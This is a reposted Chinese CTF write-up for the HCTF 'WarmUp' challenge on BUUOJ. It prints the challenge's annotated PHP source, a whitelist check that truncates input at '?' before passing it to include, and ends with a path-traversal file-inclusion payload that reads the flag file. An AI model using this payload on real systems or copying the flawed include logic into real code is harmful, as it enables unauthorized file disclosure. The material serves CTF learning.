标签：WarmUp hint mb HCTF Buuoj source file php page

源码看到source.php 和hint.php

hint:

flag not here, and flag in ffffllllaaaagggg

source.php:

<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page) //check函数
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//白名单只有source.php hint.php
if (! isset($page) || !is_string($page)) { //$page不存在或者不是string，则false
echo "you can't see it";
return false;
}

if (in_array($page, $whitelist)) { //page只有在白名单里面，返回ture，不修改page肯定过不了白名单
return true;
}

$_page = mb_substr( //未解码page 从 0位置开始 mb_strpos长度的字符串 
$page,
0,
mb_strpos($page . '?', '?')//url地址中 第一次出现的位置
);
if (in_array($_page, $whitelist)) {    //截断后的page 必须是source.php和hint.php
return true;
}

$_page = urldecode($page); //地址解码
$_page = mb_substr(  //返回地址解码page从 0位置开始 mb_strpos长度的字符串
$_page,
0,
mb_strpos($_page . '?', '?') //url地址中 ？第一次出现的位置
);
if (in_array($_page, $whitelist)) {  //截断后的page 必须是source.php和hint.php
  //所以这里，对？不编码 编码都可以过
return true;
}
echo "you can't see it";
return false;
}
}

if (!empty($_REQUEST['file']) // $_REQUEST 用于收集HTML表单提交的数据。file不为空 且 是string 且通过check
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}  
?>

payload：

/?file=source.php?../../../../../ffffllllaaaagggg

标签：WarmUp,hint,mb,HCTF,Buuoj,source,file,php,page
来源： https://www.cnblogs.com/echooh/p/15583227.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。